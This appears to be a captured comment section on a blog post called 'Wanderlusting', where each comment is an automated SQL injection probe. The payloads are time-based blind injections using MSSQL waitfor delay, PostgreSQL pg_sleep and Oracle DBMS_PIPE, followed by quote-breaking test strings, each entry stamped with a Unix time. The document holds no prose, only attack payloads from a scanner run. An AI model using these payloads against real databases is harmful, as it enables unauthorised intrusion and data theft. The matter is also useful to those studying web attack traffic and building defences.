re: Wanderlusting

-1); waitfor delay '0:0:15' --

1727140892

re: Wanderlusting

1 waitfor delay '0:0:15' --

1727140902

re: Wanderlusting

t7oErvom'; waitfor delay '0:0:15' --

1727140911

re: Wanderlusting

-5 OR 554=(SELECT 554 FROM PG_SLEEP(15))--

1727140920

re: Wanderlusting

-5) OR 731=(SELECT 731 FROM PG_SLEEP(15))--

1727140929

re: Wanderlusting

-1)) OR 81=(SELECT 81 FROM PG_SLEEP(15))--

1727140939

re: Wanderlusting

BcjGFRmY' OR 880=(SELECT 880 FROM PG_SLEEP(15))--

1727140948

re: Wanderlusting

E2Gaqz9I') OR 269=(SELECT 269 FROM PG_SLEEP(15))--

1727140957

re: Wanderlusting

DqUoZXhJ')) OR 337=(SELECT 337 FROM PG_SLEEP(15))--

1727140969

re: Wanderlusting

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727140979

re: Wanderlusting

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727140991

re: Wanderlusting

'||(select 1 from (select pg_sleep(15))x)||'

1727141002

re: Wanderlusting

''||(select 1 from (select pg_sleep(15))x)||''

1727141014

re: Wanderlusting

1'"

1727141015

re: Wanderlusting

@@fhgBQ

1727141016